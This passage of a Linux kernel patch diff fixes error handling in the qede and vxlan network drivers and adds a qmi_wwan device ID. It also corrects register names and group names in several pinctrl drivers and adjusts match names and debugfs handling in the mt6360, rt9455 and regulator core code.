+ 	__qede_lock(edev);
+ 
+@@ -1879,7 +1879,8 @@ int qede_add_tc_flower_fltr(struct qede_dev *edev, __be16 proto,
+ 	}
+ 
+ 	/* parse flower attribute and prepare filter */
+-	if (qede_parse_flow_attr(edev, proto, f->rule, &t))
++	rc = qede_parse_flow_attr(edev, proto, f->rule, &t);
++	if (rc)
+ 		goto unlock;
+ 
+ 	/* Validate profile mode and number of filters */
+@@ -1888,11 +1889,13 @@ int qede_add_tc_flower_fltr(struct qede_dev *edev, __be16 proto,
+ 		DP_NOTICE(edev,
+ 			  "Filter configuration invalidated, filter mode=0x%x, configured mode=0x%x, filter count=0x%x\n",
+ 			  t.mode, edev->arfs->mode, edev->arfs->filter_count);
++		rc = -EINVAL;
+ 		goto unlock;
+ 	}
+ 
+ 	/* parse tc actions and get the vf_id */
+-	if (qede_parse_actions(edev, &f->rule->action, f->common.extack))
++	rc = qede_parse_actions(edev, &f->rule->action, f->common.extack);
++	if (rc)
+ 		goto unlock;
+ 
+ 	if (qede_flow_find_fltr(edev, &t)) {
+@@ -1998,10 +2001,9 @@ static int qede_flow_spec_to_rule(struct qede_dev *edev,
+ 	if (IS_ERR(flow))
+ 		return PTR_ERR(flow);
+ 
+-	if (qede_parse_flow_attr(edev, proto, flow->rule, t)) {
+-		err = -EINVAL;
++	err = qede_parse_flow_attr(edev, proto, flow->rule, t);
++	if (err)
+ 		goto err_out;
+-	}
+ 
+ 	/* Make sure location is valid and filter isn't already set */
+ 	err = qede_flow_spec_validate(edev, &flow->rule->action, t,
+diff --git a/drivers/net/usb/qmi_wwan.c b/drivers/net/usb/qmi_wwan.c
+index 2d82481d34e6b..45a542659a814 100644
+--- a/drivers/net/usb/qmi_wwan.c
++++ b/drivers/net/usb/qmi_wwan.c
+@@ -1429,6 +1429,7 @@ static const struct usb_device_id products[] = {
+ 	{QMI_FIXED_INTF(0x0489, 0xe0b5, 0)},	/* Foxconn T77W968 LTE with eSIM support*/
+ 	{QMI_FIXED_INTF(0x2692, 0x9025, 4)},    /* Cellient MPL200 (rebranded Qualcomm 05c6:9025) */
+ 	{QMI_QUIRK_SET_DTR(0x1546, 0x1342, 4)},	/* u-blox LARA-L6 */
++	{QMI_QUIRK_SET_DTR(0x33f8, 0x0104, 4)}, /* Rolling RW101 RMNET */
+ 
+ 	/* 4. Gobi 1000 devices */
+ 	{QMI_GOBI1K_DEVICE(0x05c6, 0x9212)},	/* Acer Gobi Modem Device */
+diff --git a/drivers/net/vxlan/vxlan_core.c b/drivers/net/vxlan/vxlan_core.c
+index fbd36dff9ec27..01ce289f4abf0 100644
+--- a/drivers/net/vxlan/vxlan_core.c
++++ b/drivers/net/vxlan/vxlan_core.c
+@@ -1721,6 +1721,7 @@ static int vxlan_rcv(struct sock *sk, struct sk_buff *skb)
+ 	bool raw_proto = false;
+ 	void *oiph;
+ 	__be32 vni = 0;
++	int nh;
+ 
+ 	/* Need UDP and VXLAN header to be present */
+ 	if (!pskb_may_pull(skb, VXLAN_HLEN))
+@@ -1809,9 +1810,25 @@ static int vxlan_rcv(struct sock *sk, struct sk_buff *skb)
+ 		skb->pkt_type = PACKET_HOST;
+ 	}
+ 
+-	oiph = skb_network_header(skb);
++	/* Save offset of outer header relative to skb->head,
++	 * because we are going to reset the network header to the inner header
++	 * and might change skb->head.
++	 */
++	nh = skb_network_header(skb) - skb->head;
++
+ 	skb_reset_network_header(skb);
+ 
++	if (!pskb_inet_may_pull(skb)) {
++		DEV_STATS_INC(vxlan->dev, rx_length_errors);
++		DEV_STATS_INC(vxlan->dev, rx_errors);
++		vxlan_vnifilter_count(vxlan, vni, vninode,
++				      VXLAN_VNI_STATS_RX_ERRORS, 0);
++		goto drop;
++	}
++
++	/* Get the outer header. */
++	oiph = skb->head + nh;
++
+ 	if (!vxlan_ecn_decapsulate(vs, oiph, skb)) {
+ 		++vxlan->dev->stats.rx_frame_errors;
+ 		++vxlan->dev->stats.rx_errors;
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 20160683e8685..75b4dd8a55b03 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -4284,7 +4284,7 @@ static int nvme_init_ns_head(struct nvme_ns *ns, struct nvme_ns_info *info)
+ 				"Found shared namespace %d, but multipathing not supported.\n",
+ 				info->nsid);
+ 			dev_warn_once(ctrl->device,
+-				"Support for shared namespaces without CONFIG_NVME_MULTIPATH is deprecated and will be removed in Linux 6.0\n.");
++				"Support for shared namespaces without CONFIG_NVME_MULTIPATH is deprecated and will be removed in Linux 6.0.\n");
+ 		}
+ 	}
+ 
+diff --git a/drivers/pinctrl/aspeed/pinctrl-aspeed-g6.c b/drivers/pinctrl/aspeed/pinctrl-aspeed-g6.c
+index 80838dc54b3ab..7938741136a2c 100644
+--- a/drivers/pinctrl/aspeed/pinctrl-aspeed-g6.c
++++ b/drivers/pinctrl/aspeed/pinctrl-aspeed-g6.c
+@@ -43,7 +43,7 @@
+ #define SCU614		0x614 /* Disable GPIO Internal Pull-Down #1 */
+ #define SCU618		0x618 /* Disable GPIO Internal Pull-Down #2 */
+ #define SCU61C		0x61c /* Disable GPIO Internal Pull-Down #3 */
+-#define SCU620		0x620 /* Disable GPIO Internal Pull-Down #4 */
++#define SCU630		0x630 /* Disable GPIO Internal Pull-Down #4 */
+ #define SCU634		0x634 /* Disable GPIO Internal Pull-Down #5 */
+ #define SCU638		0x638 /* Disable GPIO Internal Pull-Down #6 */
+ #define SCU690		0x690 /* Multi-function Pin Control #24 */
+@@ -2494,38 +2494,38 @@ static struct aspeed_pin_config aspeed_g6_configs[] = {
+ 	ASPEED_PULL_DOWN_PINCONF(D14, SCU61C, 0),
+ 
+ 	/* GPIOS7 */
+-	ASPEED_PULL_DOWN_PINCONF(T24, SCU620, 23),
++	ASPEED_PULL_DOWN_PINCONF(T24, SCU630, 23),
+ 	/* GPIOS6 */
+-	ASPEED_PULL_DOWN_PINCONF(P23, SCU620, 22),
++	ASPEED_PULL_DOWN_PINCONF(P23, SCU630, 22),
+ 	/* GPIOS5 */
+-	ASPEED_PULL_DOWN_PINCONF(P24, SCU620, 21),
++	ASPEED_PULL_DOWN_PINCONF(P24, SCU630, 21),
+ 	/* GPIOS4 */
+-	ASPEED_PULL_DOWN_PINCONF(R26, SCU620, 20),
++	ASPEED_PULL_DOWN_PINCONF(R26, SCU630, 20),
+ 	/* GPIOS3*/
+-	ASPEED_PULL_DOWN_PINCONF(R24, SCU620, 19),
++	ASPEED_PULL_DOWN_PINCONF(R24, SCU630, 19),
+ 	/* GPIOS2 */
+-	ASPEED_PULL_DOWN_PINCONF(T26, SCU620, 18),
++	ASPEED_PULL_DOWN_PINCONF(T26, SCU630, 18),
+ 	/* GPIOS1 */
+-	ASPEED_PULL_DOWN_PINCONF(T25, SCU620, 17),
++	ASPEED_PULL_DOWN_PINCONF(T25, SCU630, 17),
+ 	/* GPIOS0 */
+-	ASPEED_PULL_DOWN_PINCONF(R23, SCU620, 16),
++	ASPEED_PULL_DOWN_PINCONF(R23, SCU630, 16),
+ 
+ 	/* GPIOR7 */
+-	ASPEED_PULL_DOWN_PINCONF(U26, SCU620, 15),
++	ASPEED_PULL_DOWN_PINCONF(U26, SCU630, 15),
+ 	/* GPIOR6 */
+-	ASPEED_PULL_DOWN_PINCONF(W26, SCU620, 14),
++	ASPEED_PULL_DOWN_PINCONF(W26, SCU630, 14),
+ 	/* GPIOR5 */
+-	ASPEED_PULL_DOWN_PINCONF(T23, SCU620, 13),
++	ASPEED_PULL_DOWN_PINCONF(T23, SCU630, 13),
+ 	/* GPIOR4 */
+-	ASPEED_PULL_DOWN_PINCONF(U25, SCU620, 12),
++	ASPEED_PULL_DOWN_PINCONF(U25, SCU630, 12),
+ 	/* GPIOR3*/
+-	ASPEED_PULL_DOWN_PINCONF(V26, SCU620, 11),
++	ASPEED_PULL_DOWN_PINCONF(V26, SCU630, 11),
+ 	/* GPIOR2 */
+-	ASPEED_PULL_DOWN_PINCONF(V24, SCU620, 10),
++	ASPEED_PULL_DOWN_PINCONF(V24, SCU630, 10),
+ 	/* GPIOR1 */
+-	ASPEED_PULL_DOWN_PINCONF(U24, SCU620, 9),
++	ASPEED_PULL_DOWN_PINCONF(U24, SCU630, 9),
+ 	/* GPIOR0 */
+-	ASPEED_PULL_DOWN_PINCONF(V25, SCU620, 8),
++	ASPEED_PULL_DOWN_PINCONF(V25, SCU630, 8),
+ 
+ 	/* GPIOX7 */
+ 	ASPEED_PULL_DOWN_PINCONF(AB10, SCU634, 31),
+diff --git a/drivers/pinctrl/core.c b/drivers/pinctrl/core.c
+index f1962866bb814..1ef36a0a7dd20 100644
+--- a/drivers/pinctrl/core.c
++++ b/drivers/pinctrl/core.c
+@@ -2098,13 +2098,7 @@ int pinctrl_enable(struct pinctrl_dev *pctldev)
+ 
+ 	error = pinctrl_claim_hogs(pctldev);
+ 	if (error) {
+-		dev_err(pctldev->dev, "could not claim hogs: %i\n",
+-			error);
+-		pinctrl_free_pindescs(pctldev, pctldev->desc->pins,
+-				      pctldev->desc->npins);
+-		mutex_destroy(&pctldev->mutex);
+-		kfree(pctldev);
+-
++		dev_err(pctldev->dev, "could not claim hogs: %i\n", error);
+ 		return error;
+ 	}
+ 
+diff --git a/drivers/pinctrl/devicetree.c b/drivers/pinctrl/devicetree.c
+index 6e0a40962f384..5ee746cb81f59 100644
+--- a/drivers/pinctrl/devicetree.c
++++ b/drivers/pinctrl/devicetree.c
+@@ -220,14 +220,16 @@ int pinctrl_dt_to_map(struct pinctrl *p, struct pinctrl_dev *pctldev)
+ 	for (state = 0; ; state++) {
+ 		/* Retrieve the pinctrl-* property */
+ 		propname = kasprintf(GFP_KERNEL, "pinctrl-%d", state);
+-		if (!propname)
+-			return -ENOMEM;
++		if (!propname) {
++			ret = -ENOMEM;
++			goto err;
++		}
+ 		prop = of_find_property(np, propname, &size);
+ 		kfree(propname);
+ 		if (!prop) {
+ 			if (state == 0) {
+-				of_node_put(np);
+-				return -ENODEV;
++				ret = -ENODEV;
++				goto err;
+ 			}
+ 			break;
+ 		}
+diff --git a/drivers/pinctrl/intel/pinctrl-baytrail.c b/drivers/pinctrl/intel/pinctrl-baytrail.c
+index 67db79f380510..a0b7b16cb4de3 100644
+--- a/drivers/pinctrl/intel/pinctrl-baytrail.c
++++ b/drivers/pinctrl/intel/pinctrl-baytrail.c
+@@ -276,33 +276,33 @@ static const unsigned int byt_score_plt_clk5_pins[] = { 101 };
+ static const unsigned int byt_score_smbus_pins[] = { 51, 52, 53 };
+ 
+ static const struct intel_pingroup byt_score_groups[] = {
+-	PIN_GROUP("uart1_grp", byt_score_uart1_pins, 1),
+-	PIN_GROUP("uart2_grp", byt_score_uart2_pins, 1),
+-	PIN_GROUP("pwm0_grp", byt_score_pwm0_pins, 1),
+-	PIN_GROUP("pwm1_grp", byt_score_pwm1_pins, 1),
+-	PIN_GROUP("ssp2_grp", byt_score_ssp2_pins, 1),
+-	PIN_GROUP("sio_spi_grp", byt_score_sio_spi_pins, 1),
+-	PIN_GROUP("i2c5_grp", byt_score_i2c5_pins, 1),
+-	PIN_GROUP("i2c6_grp", byt_score_i2c6_pins, 1),
+-	PIN_GROUP("i2c4_grp", byt_score_i2c4_pins, 1),
+-	PIN_GROUP("i2c3_grp", byt_score_i2c3_pins, 1),
+-	PIN_GROUP("i2c2_grp", byt_score_i2c2_pins, 1),
+-	PIN_GROUP("i2c1_grp", byt_score_i2c1_pins, 1),
+-	PIN_GROUP("i2c0_grp", byt_score_i2c0_pins, 1),
+-	PIN_GROUP("ssp0_grp", byt_score_ssp0_pins, 1),
+-	PIN_GROUP("ssp1_grp", byt_score_ssp1_pins, 1),
+-	PIN_GROUP("sdcard_grp", byt_score_sdcard_pins, byt_score_sdcard_mux_values),
+-	PIN_GROUP("sdio_grp", byt_score_sdio_pins, 1),
+-	PIN_GROUP("emmc_grp", byt_score_emmc_pins, 1),
+-	PIN_GROUP("lpc_grp", byt_score_ilb_lpc_pins, 1),
+-	PIN_GROUP("sata_grp", byt_score_sata_pins, 1),
+-	PIN_GROUP("plt_clk0_grp", byt_score_plt_clk0_pins, 1),
+-	PIN_GROUP("plt_clk1_grp", byt_score_plt_clk1_pins, 1),
+-	PIN_GROUP("plt_clk2_grp", byt_score_plt_clk2_pins, 1),
+-	PIN_GROUP("plt_clk3_grp", byt_score_plt_clk3_pins, 1),
+-	PIN_GROUP("plt_clk4_grp", byt_score_plt_clk4_pins, 1),
+-	PIN_GROUP("plt_clk5_grp", byt_score_plt_clk5_pins, 1),
+-	PIN_GROUP("smbus_grp", byt_score_smbus_pins, 1),
++	PIN_GROUP_GPIO("uart1_grp", byt_score_uart1_pins, 1),
++	PIN_GROUP_GPIO("uart2_grp", byt_score_uart2_pins, 1),
++	PIN_GROUP_GPIO("pwm0_grp", byt_score_pwm0_pins, 1),
++	PIN_GROUP_GPIO("pwm1_grp", byt_score_pwm1_pins, 1),
++	PIN_GROUP_GPIO("ssp2_grp", byt_score_ssp2_pins, 1),
++	PIN_GROUP_GPIO("sio_spi_grp", byt_score_sio_spi_pins, 1),
++	PIN_GROUP_GPIO("i2c5_grp", byt_score_i2c5_pins, 1),
++	PIN_GROUP_GPIO("i2c6_grp", byt_score_i2c6_pins, 1),
++	PIN_GROUP_GPIO("i2c4_grp", byt_score_i2c4_pins, 1),
++	PIN_GROUP_GPIO("i2c3_grp", byt_score_i2c3_pins, 1),
++	PIN_GROUP_GPIO("i2c2_grp", byt_score_i2c2_pins, 1),
++	PIN_GROUP_GPIO("i2c1_grp", byt_score_i2c1_pins, 1),
++	PIN_GROUP_GPIO("i2c0_grp", byt_score_i2c0_pins, 1),
++	PIN_GROUP_GPIO("ssp0_grp", byt_score_ssp0_pins, 1),
++	PIN_GROUP_GPIO("ssp1_grp", byt_score_ssp1_pins, 1),
++	PIN_GROUP_GPIO("sdcard_grp", byt_score_sdcard_pins, byt_score_sdcard_mux_values),
++	PIN_GROUP_GPIO("sdio_grp", byt_score_sdio_pins, 1),
++	PIN_GROUP_GPIO("emmc_grp", byt_score_emmc_pins, 1),
++	PIN_GROUP_GPIO("lpc_grp", byt_score_ilb_lpc_pins, 1),
++	PIN_GROUP_GPIO("sata_grp", byt_score_sata_pins, 1),
++	PIN_GROUP_GPIO("plt_clk0_grp", byt_score_plt_clk0_pins, 1),
++	PIN_GROUP_GPIO("plt_clk1_grp", byt_score_plt_clk1_pins, 1),
++	PIN_GROUP_GPIO("plt_clk2_grp", byt_score_plt_clk2_pins, 1),
++	PIN_GROUP_GPIO("plt_clk3_grp", byt_score_plt_clk3_pins, 1),
++	PIN_GROUP_GPIO("plt_clk4_grp", byt_score_plt_clk4_pins, 1),
++	PIN_GROUP_GPIO("plt_clk5_grp", byt_score_plt_clk5_pins, 1),
++	PIN_GROUP_GPIO("smbus_grp", byt_score_smbus_pins, 1),
+ };
+ 
+ static const char * const byt_score_uart_groups[] = {
+@@ -330,12 +330,14 @@ static const char * const byt_score_plt_clk_groups[] = {
+ };
+ static const char * const byt_score_smbus_groups[] = { "smbus_grp" };
+ static const char * const byt_score_gpio_groups[] = {
+-	"uart1_grp", "uart2_grp", "pwm0_grp", "pwm1_grp", "ssp0_grp",
+-	"ssp1_grp", "ssp2_grp", "sio_spi_grp", "i2c0_grp", "i2c1_grp",
+-	"i2c2_grp", "i2c3_grp", "i2c4_grp", "i2c5_grp", "i2c6_grp",
+-	"sdcard_grp", "sdio_grp", "emmc_grp", "lpc_grp", "sata_grp",
+-	"plt_clk0_grp", "plt_clk1_grp", "plt_clk2_grp", "plt_clk3_grp",
+-	"plt_clk4_grp", "plt_clk5_grp", "smbus_grp",
++	"uart1_grp_gpio", "uart2_grp_gpio", "pwm0_grp_gpio",
++	"pwm1_grp_gpio", "ssp0_grp_gpio", "ssp1_grp_gpio", "ssp2_grp_gpio",
++	"sio_spi_grp_gpio", "i2c0_grp_gpio", "i2c1_grp_gpio", "i2c2_grp_gpio",
++	"i2c3_grp_gpio", "i2c4_grp_gpio", "i2c5_grp_gpio", "i2c6_grp_gpio",
++	"sdcard_grp_gpio", "sdio_grp_gpio", "emmc_grp_gpio", "lpc_grp_gpio",
++	"sata_grp_gpio", "plt_clk0_grp_gpio", "plt_clk1_grp_gpio",
++	"plt_clk2_grp_gpio", "plt_clk3_grp_gpio", "plt_clk4_grp_gpio",
++	"plt_clk5_grp_gpio", "smbus_grp_gpio",
+ };
+ 
+ static const struct intel_function byt_score_functions[] = {
+@@ -454,8 +456,8 @@ static const struct intel_pingroup byt_sus_groups[] = {
+ 	PIN_GROUP("usb_oc_grp_gpio", byt_sus_usb_over_current_pins, byt_sus_usb_over_current_gpio_mode_values),
+ 	PIN_GROUP("usb_ulpi_grp_gpio", byt_sus_usb_ulpi_pins, byt_sus_usb_ulpi_gpio_mode_values),
+ 	PIN_GROUP("pcu_spi_grp_gpio", byt_sus_pcu_spi_pins, byt_sus_pcu_spi_gpio_mode_values),
+-	PIN_GROUP("pmu_clk1_grp", byt_sus_pmu_clk1_pins, 1),
+-	PIN_GROUP("pmu_clk2_grp", byt_sus_pmu_clk2_pins, 1),
++	PIN_GROUP_GPIO("pmu_clk1_grp", byt_sus_pmu_clk1_pins, 1),
++	PIN_GROUP_GPIO("pmu_clk2_grp", byt_sus_pmu_clk2_pins, 1),
+ };
+ 
+ static const char * const byt_sus_usb_groups[] = {
+@@ -467,7 +469,7 @@ static const char * const byt_sus_pmu_clk_groups[] = {
+ };
+ static const char * const byt_sus_gpio_groups[] = {
+ 	"usb_oc_grp_gpio", "usb_ulpi_grp_gpio", "pcu_spi_grp_gpio",
+-	"pmu_clk1_grp", "pmu_clk2_grp",
++	"pmu_clk1_grp_gpio", "pmu_clk2_grp_gpio",
+ };
+ 
+ static const struct intel_function byt_sus_functions[] = {
+diff --git a/drivers/pinctrl/intel/pinctrl-intel.c b/drivers/pinctrl/intel/pinctrl-intel.c
+index 954a412267402..8542053d4d6d0 100644
+--- a/drivers/pinctrl/intel/pinctrl-intel.c
++++ b/drivers/pinctrl/intel/pinctrl-intel.c
+@@ -362,7 +362,7 @@ static const char *intel_get_function_name(struct pinctrl_dev *pctldev,
+ {
+ 	struct intel_pinctrl *pctrl = pinctrl_dev_get_drvdata(pctldev);
+ 
+-	return pctrl->soc->functions[function].name;
++	return pctrl->soc->functions[function].func.name;
+ }
+ 
+ static int intel_get_function_groups(struct pinctrl_dev *pctldev,
+@@ -372,8 +372,8 @@ static int intel_get_function_groups(struct pinctrl_dev *pctldev,
+ {
+ 	struct intel_pinctrl *pctrl = pinctrl_dev_get_drvdata(pctldev);
+ 
+-	*groups = pctrl->soc->functions[function].groups;
+-	*ngroups = pctrl->soc->functions[function].ngroups;
++	*groups = pctrl->soc->functions[function].func.groups;
++	*ngroups = pctrl->soc->functions[function].func.ngroups;
+ 	return 0;
+ }
+ 
+diff --git a/drivers/pinctrl/intel/pinctrl-intel.h b/drivers/pinctrl/intel/pinctrl-intel.h
+index 65628423bf639..0d45063435ebc 100644
+--- a/drivers/pinctrl/intel/pinctrl-intel.h
++++ b/drivers/pinctrl/intel/pinctrl-intel.h
+@@ -36,11 +36,13 @@ struct intel_pingroup {
+ 
+ /**
+  * struct intel_function - Description about a function
++ * @func: Generic data of the pin function (name and groups of pins)
+  * @name: Name of the function
+  * @groups: An array of groups for this function
+  * @ngroups: Number of groups in @groups
+  */
+ struct intel_function {
++	struct pinfunction func;
+ 	const char *name;
+ 	const char * const *groups;
+ 	size_t ngroups;
+@@ -158,11 +160,16 @@ struct intel_community {
+ 		.modes = __builtin_choose_expr(__builtin_constant_p((m)), NULL, (m)),	\
+ 	}
+ 
+-#define FUNCTION(n, g)				\
+-	{					\
+-		.name = (n),			\
+-		.groups = (g),			\
+-		.ngroups = ARRAY_SIZE((g)),	\
++#define PIN_GROUP_GPIO(n, p, m)						\
++	 PIN_GROUP(n, p, m),						\
++	 PIN_GROUP(n "_gpio", p, 0)
++
++#define FUNCTION(n, g)							\
++	{								\
++		.func = PINCTRL_PINFUNCTION((n), (g), ARRAY_SIZE(g)),	\
++		.name = (n),						\
++		.groups = (g),						\
++		.ngroups = ARRAY_SIZE((g)),				\
+ 	}
+ 
+ /**
+diff --git a/drivers/pinctrl/mediatek/pinctrl-paris.c b/drivers/pinctrl/mediatek/pinctrl-paris.c
+index ad873bd051b68..ee72c6894a5d7 100644
+--- a/drivers/pinctrl/mediatek/pinctrl-paris.c
++++ b/drivers/pinctrl/mediatek/pinctrl-paris.c
+@@ -160,20 +160,21 @@ static int mtk_pinconf_get(struct pinctrl_dev *pctldev,
+ 		err = mtk_hw_get_value(hw, desc, PINCTRL_PIN_REG_SR, &ret);
+ 		break;
+ 	case PIN_CONFIG_INPUT_ENABLE:
+-	case PIN_CONFIG_OUTPUT_ENABLE:
++		err = mtk_hw_get_value(hw, desc, PINCTRL_PIN_REG_IES, &ret);
++		if (!ret)
++			err = -EINVAL;
++		break;
++	case PIN_CONFIG_OUTPUT:
+ 		err = mtk_hw_get_value(hw, desc, PINCTRL_PIN_REG_DIR, &ret);
+ 		if (err)
+ 			break;
+-		/*     CONFIG     Current direction return value
+-		 * -------------  ----------------- ----------------------
+-		 * OUTPUT_ENABLE       output       1 (= HW value)
+-		 *                     input        0 (= HW value)
+-		 * INPUT_ENABLE        output       0 (= reverse HW value)
+-		 *                     input        1 (= reverse HW value)
+-		 */
+-		if (param == PIN_CONFIG_INPUT_ENABLE)
+-			ret = !ret;
+ 
++		if (!ret) {
++			err = -EINVAL;
++			break;
++		}
++
++		err = mtk_hw_get_value(hw, desc, PINCTRL_PIN_REG_DO, &ret);
+ 		break;
+ 	case PIN_CONFIG_INPUT_SCHMITT_ENABLE:
+ 		err = mtk_hw_get_value(hw, desc, PINCTRL_PIN_REG_DIR, &ret);
+@@ -188,6 +189,8 @@ static int mtk_pinconf_get(struct pinctrl_dev *pctldev,
+ 		}
+ 
+ 		err = mtk_hw_get_value(hw, desc, PINCTRL_PIN_REG_SMT, &ret);
++		if (!ret)
++			err = -EINVAL;
+ 		break;
+ 	case PIN_CONFIG_DRIVE_STRENGTH:
+ 		if (!hw->soc->drive_get)
+@@ -276,26 +279,9 @@ static int mtk_pinconf_set(struct pinctrl_dev *pctldev, unsigned int pin,
+ 			break;
+ 		err = hw->soc->bias_set_combo(hw, desc, 0, arg);
+ 		break;
+-	case PIN_CONFIG_OUTPUT_ENABLE:
+-		err = mtk_hw_set_value(hw, desc, PINCTRL_PIN_REG_SMT,
+-				       MTK_DISABLE);
+-		/* Keep set direction to consider the case that a GPIO pin
+-		 *  does not have SMT control
+-		 */
+-		if (err != -ENOTSUPP)
+-			break;
+-
+-		err = mtk_hw_set_value(hw, desc, PINCTRL_PIN_REG_DIR,
+-				       MTK_OUTPUT);
+-		break;
+ 	case PIN_CONFIG_INPUT_ENABLE:
+ 		/* regard all non-zero value as enable */
+ 		err = mtk_hw_set_value(hw, desc, PINCTRL_PIN_REG_IES, !!arg);
+-		if (err)
+-			break;
+-
+-		err = mtk_hw_set_value(hw, desc, PINCTRL_PIN_REG_DIR,
+-				       MTK_INPUT);
+ 		break;
+ 	case PIN_CONFIG_SLEW_RATE:
+ 		/* regard all non-zero value as enable */
+diff --git a/drivers/pinctrl/meson/pinctrl-meson-a1.c b/drivers/pinctrl/meson/pinctrl-meson-a1.c
+index 79f5d753d7e1a..50a87d9618a8e 100644
+--- a/drivers/pinctrl/meson/pinctrl-meson-a1.c
++++ b/drivers/pinctrl/meson/pinctrl-meson-a1.c
+@@ -250,7 +250,7 @@ static const unsigned int pdm_dclk_x_pins[]		= { GPIOX_10 };
+ static const unsigned int pdm_din2_a_pins[]		= { GPIOA_6 };
+ static const unsigned int pdm_din1_a_pins[]		= { GPIOA_7 };
+ static const unsigned int pdm_din0_a_pins[]		= { GPIOA_8 };
+-static const unsigned int pdm_dclk_pins[]		= { GPIOA_9 };
++static const unsigned int pdm_dclk_a_pins[]		= { GPIOA_9 };
+ 
+ /* gen_clk */
+ static const unsigned int gen_clk_x_pins[]		= { GPIOX_7 };
+@@ -591,7 +591,7 @@ static struct meson_pmx_group meson_a1_periphs_groups[] = {
+ 	GROUP(pdm_din2_a,		3),
+ 	GROUP(pdm_din1_a,		3),
+ 	GROUP(pdm_din0_a,		3),
+-	GROUP(pdm_dclk,			3),
++	GROUP(pdm_dclk_a,		3),
+ 	GROUP(pwm_c_a,			3),
+ 	GROUP(pwm_b_a,			3),
+ 
+@@ -755,7 +755,7 @@ static const char * const spi_a_groups[] = {
+ 
+ static const char * const pdm_groups[] = {
+ 	"pdm_din0_x", "pdm_din1_x", "pdm_din2_x", "pdm_dclk_x", "pdm_din2_a",
+-	"pdm_din1_a", "pdm_din0_a", "pdm_dclk",
++	"pdm_din1_a", "pdm_din0_a", "pdm_dclk_a",
+ };
+ 
+ static const char * const gen_clk_groups[] = {
+diff --git a/drivers/power/supply/mt6360_charger.c b/drivers/power/supply/mt6360_charger.c
+index f1248faf59058..383bf19819dfb 100644
+--- a/drivers/power/supply/mt6360_charger.c
++++ b/drivers/power/supply/mt6360_charger.c
+@@ -591,7 +591,7 @@ static const struct regulator_ops mt6360_chg_otg_ops = {
+ };
+ 
+ static const struct regulator_desc mt6360_otg_rdesc = {
+-	.of_match = "usb-otg-vbus",
++	.of_match = "usb-otg-vbus-regulator",
+ 	.name = "usb-otg-vbus",
+ 	.ops = &mt6360_chg_otg_ops,
+ 	.owner = THIS_MODULE,
+diff --git a/drivers/power/supply/rt9455_charger.c b/drivers/power/supply/rt9455_charger.c
+index 72962286d7045..c5597967a0699 100644
+--- a/drivers/power/supply/rt9455_charger.c
++++ b/drivers/power/supply/rt9455_charger.c
+@@ -193,6 +193,7 @@ static const int rt9455_voreg_values[] = {
+ 	4450000, 4450000, 4450000, 4450000, 4450000, 4450000, 4450000, 4450000
+ };
+ 
++#if IS_ENABLED(CONFIG_USB_PHY)
+ /*
+  * When the charger is in boost mode, REG02[7:2] represent boost output
+  * voltage.
+@@ -208,6 +209,7 @@ static const int rt9455_boost_voltage_values[] = {
+ 	5600000, 5600000, 5600000, 5600000, 5600000, 5600000, 5600000, 5600000,
+ 	5600000, 5600000, 5600000, 5600000, 5600000, 5600000, 5600000, 5600000,
+ };
++#endif
+ 
+ /* REG07[3:0] (VMREG) in uV */
+ static const int rt9455_vmreg_values[] = {
+diff --git a/drivers/regulator/core.c b/drivers/regulator/core.c
+index c8702011b7613..ff11f37e28c71 100644
+--- a/drivers/regulator/core.c
++++ b/drivers/regulator/core.c
+@@ -1916,19 +1916,24 @@ static struct regulator *create_regulator(struct regulator_dev *rdev,
+ 		}
+ 	}
+ 
+-	if (err != -EEXIST)
++	if (err != -EEXIST) {
+ 		regulator->debugfs = debugfs_create_dir(supply_name, rdev->debugfs);
+-	if (IS_ERR(regulator->debugfs))
+-		rdev_dbg(rdev, "Failed to create debugfs directory\n");
++		if (IS_ERR(regulator->debugfs)) {
++			rdev_dbg(rdev, "Failed to create debugfs directory\n");
++			regulator->debugfs = NULL;
++		}
++	}
+ 
+-	debugfs_create_u32("uA_load", 0444, regulator->debugfs,
+-			   &regulator->uA_load);
+-	debugfs_create_u32("min_uV", 0444, regulator->debugfs,
+-			   &regulator->voltage[PM_SUSPEND_ON].min_uV);
+-	debugfs_create_u32("max_uV", 0444, regulator->debugfs,
+-			   &regulator->voltage[PM_SUSPEND_ON].max_uV);
+-	debugfs_create_file("constraint_flags", 0444, regulator->debugfs,
+-			    regulator, &constraint_flags_fops);
++	if (regulator->debugfs) {
++		debugfs_create_u32("uA_load", 0444, regulator->debugfs,
++				   &regulator->uA_load);
++		debugfs_create_u32("min_uV", 0444, regulator->debugfs,
++				   &regulator->voltage[PM_SUSPEND_ON].min_uV);
++		debugfs_create_u32("max_uV", 0444, regulator->debugfs,
++				   &regulator->voltage[PM_SUSPEND_ON].max_uV);
++		debugfs_create_file("constraint_flags", 0444, regulator->debugfs,
++				    regulator, &constraint_flags_fops);
++	}
+ 
+ 	/*
+ 	 * Check now if the regulator is an always on regulator - if
+diff --git a/drivers/regulator/mt6360-regulator.c b/drivers/regulator/mt6360-regulator.c
+index 4d34be94d1663..fc464a4450dc5 100644
+--- a/drivers/regulator/mt6360-regulator.c
++++ b/drivers/regulator/mt6360-regulator.c
+@@ -319,15 +319,15 @@ static unsigned int mt6360_regulator_of_map_mode(unsigned int hw_mode)
+ 	}
+ }
+ 
+-#define MT6360_REGULATOR_DESC(_name, _sname, ereg, emask, vreg,	vmask,	\
+-			      mreg, mmask, streg, stmask, vranges,	\
+-			      vcnts, offon_delay, irq_tbls)		\
++#define MT6360_REGULATOR_DESC(match, _name, _sname, ereg, emask, vreg,	\
++			      vmask, mreg, mmask, streg, stmask,	\
++			      vranges, vcnts, offon_delay, irq_tbls)	\
+ {									\
+ 	.desc = {							\
+ 		.name = #_name,						\
+ 		.supply_name = #_sname,					\
+ 		.id =  MT6360_REGULATOR_##_name,			\
+-		.of_match = of_match_ptr(#_name),			\
++		.of_match = of_match_ptr(match),			\
+ 		.regulators_node = of_match_ptr("regulator"),		\
+ 		.of_map_mode = mt6360_regulator_of_map_mode,		\
+ 		.owner = THIS_MODULE,					\
+@@ -351,21 +351,29 @@ static unsigned int mt6360_regulator_of_map_mode(unsigned int hw_mode)
+ }
+ 
+ static const struct mt6360_regulator_desc mt6360_regulator_descs[] =  {
+-	MT6360_REGULATOR_DESC(BUCK1, BUCK1_VIN, 0x117, 0x40, 0x110, 0xff, 0x117, 0x30, 0x117, 0x04,
++	MT6360_REGULATOR_DESC("buck1", BUCK1, BUCK1_VIN,
++			      0x117, 0x40, 0x110, 0xff, 0x117, 0x30, 0x117, 0x04,
